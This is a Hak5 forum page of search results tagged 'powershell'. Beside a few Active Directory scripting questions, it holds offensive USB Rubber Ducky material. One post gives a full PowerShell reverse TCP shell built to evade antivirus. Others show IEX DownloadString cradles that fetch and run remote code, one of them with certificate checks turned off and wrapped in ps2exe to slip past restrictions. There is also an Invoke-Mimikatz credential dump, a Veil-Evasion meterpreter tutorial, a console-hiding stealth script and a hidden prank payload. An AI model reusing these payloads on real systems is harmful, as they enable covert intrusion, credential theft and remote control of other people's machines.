Jump to content

Search the Community

Showing results for tags 'powershell'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. Hi guys, I have the following PowerShell script, which finds the list of groups a user is a member of, formats them to name only, and then is supposed to list yes or no to which groups begin with the '@' symbol; $CurrentGroups = Get-ADuser JOEBLOGGS -property MemberOf | % {$_.MemberOf | Get-ADGroup | select Name | sort name} foreach($Group in $CurrentGroups) { if("$Group" -match "`@") { echo Yep $Group } else { echo Nope $Group }} User JOEBLOGGS is a member of; @Testone @Testtwo Testthree Testfour On running this script, I would expect the output to be; Yep @Testone Yep @Testtwo Nope Testthree Nope Testfour However, it instead states 'Yep' to all of them, not just the groups beginning with an '@' symbol. I have tried -like, -match, -contains as well as "\@", "@*" and "@". None work correctly. If I run -match "@Test", this works fine, but not all of the groups in our AD that begin with an @ symbol follow with the same digits, so I need this to work with just searching for all groups that begin with an @ symbol. Thank you.
  2. Hi All, I'm looking for help with powershell commands. I've got my duckberry pi working, and the plan is to have a duckyscript use powershell to download payloads from a http or ftp server (which is running on my android phone) on a local network. I've got SimpleHttpServer and Android FTPServer hosting a text file, and they seem to be working, because I can access the test file via browser at ip:port & through FileZilla. The closest I've gotten thus far to making this happen with powershell is this command: powershell "IEX (New-Object Net.Webclient).DownloadString('http://XXX.XXX.XXX.XXX:12345/derp.txt')" The error message I get is: The term 'TEST' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:5 + TEST <<<< + CategoryInfo : ObjectNotFound: (TEST:String) [], CommandNotFoun dException + FullyQualifiedErrorId : CommandNotFoundException Now...the term 'TEST' is the only text within the derp.txt file, and it changes when I change the contents of the text file, so it appears to be able to accessing the right file in the right place. Now, I can't figure out how to download this file. Anyone have suggestions? Also, what would this powershell script look like if I were attempting to access a file at a local ftp server? And if that ftp server required username and password? Thanks! OBL
  3. Reverse TCP Shell using Powershell Only Hi Guys. I was having problems getting a payload for the ducky that wasn't detected by Kaspersky, AVG etc. So I started to look into the possibility of using Powershell only to create a reverse TCP shell. I found some promising base code on a Powershell site and made some additions/adaptations for connection resilience and error handling. Now, the nice thing about this PS script is that it's compatible with a netcat listener! Should be very easy to utilize this via a ducky script on my 'WiDucky'. (Wifi enabled ducky - https://github.com/basic4/WiDucky) Just setup a netcat listener on the attacker machine with: nc -l 6673 I've added code for the script to automatically reconnect to the attacker if connection is lost, and the script also returns shell error text to the listener too. The Powershell Script itself (could still use some tidying up - but works perfectly as is :) while (1 -eq 1) { $ErrorActionPreference = 'Continue'; try { #attempt inital connection $client = New-Object System.Net.Sockets.TCPClient("",6673); $stream = $client.GetStream(); [byte[]]$bytes = 0..255|%{0}; $sendbytes = ([text.encoding]::ASCII).GetBytes("Client Connected..."+"`n`n" + "PS " + (pwd).Path + "> "); $stream.Write($sendbytes,0,$sendbytes.Length);$stream.Flush(); while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $recdata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); if($recdata.StartsWith("kill-link")){ cls; $client.Close(); exit;} try { #attempt to execute the received command $sendback = (iex $recdata 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (pwd).Path + "> "; } catch { $error[0].ToString() + $error[0].InvocationInfo.PositionMessage; $sendback2 = "ERROR: " + $error[0].ToString() + "`n`n" + "PS " + (pwd).Path + "> "; cls; } $returnbytes = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($returnbytes,0,$returnbytes.Length);$stream.Flush(); } } catch { #an initial connection error - close and wait 30 secs then retry if($client.Connected) { $client.Close(); } cls; Start-Sleep -s 30; } } This is my first powershell script. But given how easy it was to get this working, I'm certainly going to use it more. Regards, Basic4. PS_TCP4.ps1
  4. Hello Guys. I'm new in this community so nice to meet you! I'm very happy to write finally on this forum I've been reading for a while by now. I finally managed to built my Twin Ducky able to steal targeted files, following the lasts episodes of DK (2112-2113-2114) So of course I started enjoying to play with the parameters of e.cmd, and I was able to manage (unfortunately I have to admit, without any coding skills, don't get mad at me :P) to teach the rubber ducky not to steal just PDFs in the Documents folder but also to look for any pdf and doc file in all the folders belonging to %USERPROFILE% . Now, I wanted to go even further by making the process even faster. I thought the duration variable of the exfiltration process depends on the size of the pdf/doc/whatever document which we are trying to steal, and MAYBE we already know that the document we are looking for doesn't exceed a size of let's say 10-15 MB.. Wouldn't it be cool to write also a line to exclude those files? Wouldn't it be even faster? What do you think about this? Hope not to have written something stupid :S I'm not native English neither experienced in pentesting like you guys, so.. in that case forgive me. Let me know :) Have a nice day!
  5. Afternoon all - I've been manually playing with the evil twin duck mimikatz hack or memory leaker, whatever you wanna call it. Anywho - to test I copied the powershell script I found on another hak5 forum locally and call it like the below powershell "IEX (New-Object Net.WebClient).DownloadString('c:\users\ballsdeep\desktop\test.ps1'); Invoke-Mimikatz -DumpCreds" Well, I get the following error and i know why: ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list When I read thru the powershell script, it's missing the privilege line: "privilege::debug" The below portion of the script is what I think I need to modify because if I modify it to run the priv command only, the script executes and works (returns Privilege '20' OK) How do I run the priv command and then the dump passwords command? if ($PsCmdlet.ParameterSetName -ieq "DumpCreds") { $ExeArgs = "sekurlsa::logonpasswords Exit" } elseif ($PsCmdlet.ParameterSetName -ieq "DumpCerts") { $ExeArgs = "crypto::cng crypto::capi `"crypto::certificates /export`" `"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`" exit" } else { $ExeArgs = $Command }
  6. Hi, I have been playing a little with Powershell and have come up with a proof-of-concept using Powershell for APT. I have a full description of the code here: http://www.cron.dk/powershell-hacking/ Please drop me a note if you find it interesting. Best regards, Alex
  7. Hi all, I have the following line of code in a PowerShell file, intended to remove a user from all Active Directory groups beginning with an @ symbol; Get-ADGroup -Filter 'name -like "@*"' | Remove-ADGroupMember -Members $UserID It actually works fine, and successfully removes them from the correct groups, however the script locks my admin account every time it's run. Weird! I suspect it's to do with it 'using up' my Kerberos authentication tokens (it uses too many, as it runs for every single AD group beginning with @), or it thinks I'm trying to do something malicious because I'm sending such a large amount of commands in a short time? Is there a way for me to amend this line of code, so that instead of running Remove-ADGroupMember for every single @ group in the Active Directory, it only runs for the groups that the user is a member of? Or any other ideas? Thank you.
  8. Hi all, I'm using... Get-ADuser $UserID -property MemberOf | % {$_.MemberOf | Get-ADGroup | select Name | sort name} ...to nicely list all the of the Active Directory groups that a user is a member of, in an easy-to-read format. I'm trying to only list the groups that begin with an @ sign. So instead of... @Group 1 @Group 2 Group 3 Group 4 ...I would get just... @Group 1 @Group 2 I'm then looking to remove these groups from the user's account. So, in summary; Get only the MemberOf groups beginning with @, for a user remove user from these groups How would I go about this? I've been playing for a while, but have got no further than the script above. Thank you,
  9. Hi all, I'm looking to make a script, in either batch or Powershell, that will give a user access to a folder and all folders leading down to it. So, it would; Ask for input of Active Directory UserID Ask for input of a folder path List all of the security groups for the first folder in the path and allow selection of which one the AD UserID will be added to. List all of the security groups for the second folder in the path and allow selection of which one the AD UserID will be added to. List all of the security groups for the third folder in the path and allow selection of which one the AD UserID will be added to. etc. So, if user JBLOGGS wanted access to folder '\\Here\There\Everywhere', the script would; List the security groups for the folder '\\Here' and prompt for which AD group to add user JBLOGGS to. List the security groups for the folder '\\Here\There' and prompt for which AD group to add user JBLOGGS to. List the security groups for the folder '\\Here\There\Everywhere' and prompt for which AD group to add user JBLOGGS to. Note - The security groups for a folder are normally viewable in Windows by right clicking in a folder and going to 'Properties > Security > Group or user names' Hopefully this makes sense, if not please let me know. Please note that I understand the script for adding a user to an AD group, that's easy. The struggle is getting a script to prompt which security group for each level of the folder path the user should be added to. Thank you in advance.
  10. xor-function


    I just wanted to let everybody here know about ps2exe, if you don't already. You can find it on TechNet if you search for it. What it does is compile a script to an executable by using a c# source code template that runs the script using the system.management.automation assembly. Since it uses a class library it stands a pretty good chance on bypassing any restrictions on the Powershell.exe program file. This is an example script I compiled using ps2exe. function start-download { [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } IEX (New-Object System.Net.Webclient).DownloadString('https://some-domain.com/ps-script.ps1') [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $false } } start-download This way you can change the code server side without having to recompile the binary unless you need to change the URL. So far AV doesn't light up and It seems to be working in Windows 10.
  11. Going to try out my rubber ducky on a Windows 7 machine. What can I utilize if the target Windows 7 machine has powershell disabled and won't allow it to be installed or ran? I'm pretty sure it is being blocked by group policy
  12. Below are instructions for using Veil-Evasion to produce a Windows Powershell payload for a Meterpeter reverse TCP connection and injecting it using a USB Rubber Ducky. This is my first tutorial post, so if my formatting is a bit off... too bad ;) This method has a few benefits over the method provided using the "Simple-Ducky" program. It is injected completely through text input typed in by the Ducky into the Windows Command Shell It does not require the target computer to download a compiled file from a web server to set up the connection. You do not have to host a web server for the payload. (Less open ports on your machine, always a good thing.) Virus scanners are (hopefully) not going to pick this up because it is being entered directly into the Command Shell by Ducky. The flip side is that this is a larger payload for Ducky to type out so you will have to plan accordingly. Initial Setup (If you are running Kali, BlackBox, Backtrack, etc. you are probably almost set up already.) Install and setup Metasploit if you have not already. Install and setup Veil-Evasion (Homepage is here). Veil-Evasion is now available in the Kali repository. Use: apt-get install veil-evasion -y Note on initial install: You need to run veil-evasion after it is loaded by apt-get to set everything up. It says you don't have to run it as root, but you need to run it as root! Setup can take a bit. Set up Ducky Encoder or whatever you choose to use to make your inject.bin. Payload Generation Start veil-evasion. Type "list" to see the list of available payloads. Enter the number for the "powershell/meterpreter/rev_tcp" payload. (Was 22 for me.) Set you LHOST and LPORT the same as you would do setting up a payload in Metasploit. Type "generate". Enter the name you want for the payload. Veil will generate the payload in a .bat file in the "Veil-Output" directory under "source". (Most likely in the /usr/share/ directory.) Veil will also generate a Metasploit resource file for setting up a listener that you can use if you want. However, if you are behind a NAT router you will need to plan accordingly. Find and open the .bat file in the text editor of your choice and copy off the first section of the file as follows: powershell.exe -Nop.....ReadToEnd();" (The first .ReadToEnd() and don't miss the quotation mark at the end, you will need that.) If your target is a 64 bit machine you will need to add "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\" prior to the powershell.exe in order for your payload to work. Set up your Ducky script as you like to account for driver install, etc. Have it open a standard command shell and copy and paste the text you cut out above into the Ducky script as a STRING: Create you inject.bin file and put it on your Ducky.Operation Start a windows/meterpreter/reverse_tcp listener in Metasploit on your machine. (32 bit, not the x64 payload) Plug the Ducky into your target machine and away you go. The Command Shell window will automatically close once the Powershell script begins to execute. You may need to migrate to another x86 process to get full Meterpreter functions. A few notes If you try to run this sever times in quick succession on a target machine the subsequent tries may not go through as Powershell likes to hang on for a bit. Killing the initial process after migrating might fix this. I've tested this on the following:Windows 7 Pro x64 (physical machine with a physical network, through a restrictive firewall... Reverse connections rock!) Windows 8.1 Pro x64 - Virtual Windows 10 Pro x64 Technical Preview - Virtual Windows Server 2008 R2 - Virtual Windows Server 2012 R2 - Virtual Enjoy.
  13. I've been working on trying to create stealthy attacks with the Rubber Ducky. I've found a way to hide the powershell console while keeping focus (which is obviously needed for input from the Ducky). The basic idea is to move the console to the edge of the screen and then shrink the size of the console and it actually disappears. Here are the commands for the basic idea: REM Once powershell is up and running ALT SPACE STRING m LEFTARROW REPEAT 50 STRING [console]::WindowHeight=1 ENTER STRING [console]::WindowWidth=1 ENTER I found that shrinking the console size is faster than moving the console, so I played around with doing both several times to try and make the console disappear faster. To make sure the Ducky still had focus and was running, I had it send me an email. Here is my test script that uses this hiding technique: REM Author: desert33 REM Name: hidePS.txt REM Purpose: Try to Hide PowerShell for a more stealthy approach. REM Encoder V2.4 REM Using the run command for a broader OS base. REM *** Initial Delay *** DELAY 2000 REM *** Open powershell *** GUI r DELAY 250 STRING powershell ENTER DELAY 400 REM *** Hide PowerShell *** STRING [console]::WindowHeight=10 ENTER STRING [console]::WindowWidth=10 ENTER ALT SPACE STRING m LEFTARROW REPEAT 30 STRING [console]::WindowHeight=5 ENTER STRING [console]::WindowWidth=5 ENTER ALT SPACE STRING m LEFTARROW REPEAT 10 STRING [console]::WindowHeight=1 ENTER STRING [console]::WindowWidth=1 ENTER REM *** Send an email to prove Ducky is working *** STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('username', 'password'); ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'from@email.com' ENTER STRING $ReportEmail.To.Add('to@email.com') ENTER STRING $ReportEmail.Subject = 'Hello' ENTER STRING $ReportEmail.Body = '"You got Ducked. Better luck next time." -desert33' ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 100 REM *** Exit *** STRING EXIT ENTER
  14. placeholder This payload will automatically eject all the CD trays to the target system at the beginning of every hour. The way I go about this is to create a powershell script from command line and then execute to as a background process with the "powershell -windowstyle hidden" command. I can see a lot of potential in having this run at startup, but I had a wave of mercy when I wrote the script. Enjoy REM Name: Poltergeist REM Author: theGANOUSH REM Purpose: To mess with my coworkers by forcing their CD drives to open at the start of every hour. REM The PowerShell code was found and modified from: http://powershell.com/cs/blogs/tips/archive/2009/04/24/ejecting-cds.aspx REM Open Command Prompt & Navigate to %temp% DELAY 5000 DELAY 10000 GUI r DELAY 300 STRING cmd.exe ENTER DELAY 300 STRING CD %temp% ENTER REM Create PowerShell Script STRING copy con Poltergeist.ps1 ENTER STRING Do ENTER STRING { ENTER STRING $minute = Get-Date -UFormat "%M" ENTER STRING If($minute -eq "00") ENTER STRING { ENTER STRING $Drives = Get-WmiObject Win32_Volume -Filter "DriveType=5" | select -exp DriveLetter ENTER STRING foreach($Drive in $Drives) ENTER STRING { ENTER STRING Invoke-Command -ScriptBlock { ENTER STRING param($Drive) ENTER STRING $Drive ENTER STRING $sa = New-Object -comObject Shell.Application ENTER STRING $sa.Namespace(17).parseName($Drive) ENTER STRING $sa.Namespace(17).ParseName("$Drive").InvokeVerb("Eject") ENTER STRING } -ArgumentList $Drive ENTER STRING } ENTER STRING } STRING Start-Sleep -s 60 ENTER STRING } ENTER STRING until(1 -gt 5) ENTER CONTROL z ENTER REM and execute for effect... STRING powershell -windowstyle hidden -file .\Poltergeist.ps1 ENTER
  • Create New...